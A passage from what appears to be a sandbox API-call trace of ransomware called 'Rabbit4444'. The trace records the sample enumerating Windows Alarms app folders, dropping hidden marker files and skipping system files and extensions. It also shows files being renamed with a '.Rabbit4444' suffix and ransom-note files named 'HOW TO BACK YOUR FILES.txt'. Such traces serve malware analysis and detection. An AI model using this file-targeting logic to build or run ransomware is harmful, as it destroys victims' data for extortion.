"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\clocks\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.479] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.482] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.483] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.483] CloseHandle (hObject=0x2cc) returned 1 [0064.483] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks") returned 94 [0064.483] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.483] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9a3b7f, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9c9cef, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xefc233a1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.484] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.484] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.484] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.484] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.484] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9a3b7f, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9c9cef, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xefc233a1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.484] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.484] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.484] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.484] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.484] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.484] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc233a1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc233a1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc233a1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.484] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.484] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.484] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9c9cef, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9c9cef, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xbe9c9cef, ftLastWriteTime.dwHighDateTime=0x1d32746, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clocks.json", cAlternateFileName="CLOCKS~1.JSO")) returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="Rabbit4444.exe") returned -1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2=".") returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="..") returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="windows") returned -1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="bootmgr") returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="pagefile.sys") returned -1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="boot") returned 1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="ids.txt") returned -1 [0064.484] lstrcmpiW (lpString1="Clocks.json", lpString2="NTUSER.DAT") returned -1 [0064.484] lstrcpyW (in: lpString1=0x130ebf6, lpString2="Clocks.json" | out: lpString1="Clocks.json") returned="Clocks.json" [0064.484] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\Clocks.json", dwFileAttributes=0x0) returned 1 [0064.485] lstrlenW (lpString="Clocks.json") returned 11 [0064.485] lstrlenW (lpString="Rabbit4444") returned 10 [0064.485] lstrcmpiW (lpString1="locks.json", lpString2="Rabbit4444") returned -1 [0064.485] lstrlenW (lpString=".dll") returned 4 [0064.485] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0064.485] lstrlenW (lpString=".lnk") returned 4 [0064.485] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0064.485] lstrlenW (lpString=".ini") returned 4 [0064.485] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0064.485] lstrlenW (lpString=".sys") returned 4 [0064.485] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0064.485] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9c9cef, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9c9cef, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xbe9c9cef, ftLastWriteTime.dwHighDateTime=0x1d32746, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clocks.json", cAlternateFileName="CLOCKS~1.JSO")) returned 0 [0064.485] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.485] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.485] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\clocks\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.488] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.488] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.488] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.488] CloseHandle (hObject=0x2a0) returned 1 [0064.488] CloseHandle (hObject=0x2cc) returned 1 [0064.489] GetCurrentThreadId () returned 0xd98 [0064.489] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0064.489] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms" [0064.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0064.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0064.489] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms" [0064.489] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\" [0064.489] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\.BFC0E91B00AE8A0620D3" [0064.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\alarms\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.492] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.494] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.495] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.495] CloseHandle (hObject=0x2cc) returned 1 [0064.495] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms") returned 94 [0064.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.495] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8bec4c, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0x6cd1c887, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xefc233a1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0064.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.495] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.495] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.495] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.495] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8bec4c, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0x6cd1c887, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xefc233a1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.496] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.496] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.496] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.496] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.496] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.496] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc233a1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc233a1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc49657, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.496] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.496] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.496] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe8e4fc6, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0x6cd166df, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x6cd17a65, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Alarms.json", cAlternateFileName="ALARMS~1.JSO")) returned 1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="Rabbit4444.exe") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2=".") returned 1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="..") returned 1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="windows") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="bootmgr") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="pagefile.sys") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="boot") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="ids.txt") returned -1 [0064.496] lstrcmpiW (lpString1="Alarms.json", lpString2="NTUSER.DAT") returned -1 [0064.496] lstrcpyW (in: lpString1=0x130ebf6, lpString2="Alarms.json" | out: lpString1="Alarms.json") returned="Alarms.json" [0064.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\Alarms.json", dwFileAttributes=0x0) returned 1 [0064.497] lstrlenW (lpString="Alarms.json") returned 11 [0064.497] lstrlenW (lpString="Rabbit4444") returned 10 [0064.497] lstrcmpiW (lpString1="larms.json", lpString2="Rabbit4444") returned -1 [0064.497] lstrlenW (lpString=".dll") returned 4 [0064.497] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0064.497] lstrlenW (lpString=".lnk") returned 4 [0064.497] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0064.497] lstrlenW (lpString=".ini") returned 4 [0064.497] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0064.497] lstrlenW (lpString=".sys") returned 4 [0064.497] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0064.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\Alarms.json" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\alarms\\alarms.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.498] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15580836656) returned 1 [0064.498] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25) returned 1 [0064.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0064.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0064.498] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x27c [0064.499] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0064.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e0b0 [0064.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0064.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0064.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e0b0 [0064.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0064.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0064.500] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15581119984) returned 1 [0064.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0064.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0064.501] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.501] CloseHandle (hObject=0x27c) returned 1 [0064.501] CloseHandle (hObject=0x2a0) returned 1 [0064.501] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\Alarms.json.Rabbit4444") returned 117 [0064.501] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\Alarms.json" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\alarms\\alarms.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\Alarms.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\alarms\\alarms.json.rabbit4444"), dwFlags=0x1) returned 1 [0064.501] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe8e4fc6, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0x6cd166df, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x6cd17a65, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Alarms.json", cAlternateFileName="ALARMS~1.JSO")) returned 0 [0064.502] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0064.502] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Alarms\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\alarms\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.502] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.502] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.502] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.503] CloseHandle (hObject=0x2a0) returned 1 [0064.503] CloseHandle (hObject=0x2cc) returned 1 [0064.503] GetCurrentThreadId () returned 0xd98 [0064.503] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0064.503] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache" [0064.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124308 | out: hHeap=0xe0000) returned 1 [0064.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0064.503] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache" [0064.503] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\" [0064.503] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0064.503] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.504] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.506] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.507] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.507] CloseHandle (hObject=0x2cc) returned 1 [0064.508] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache") returned 87 [0064.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.508] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152db4f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc49657, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, 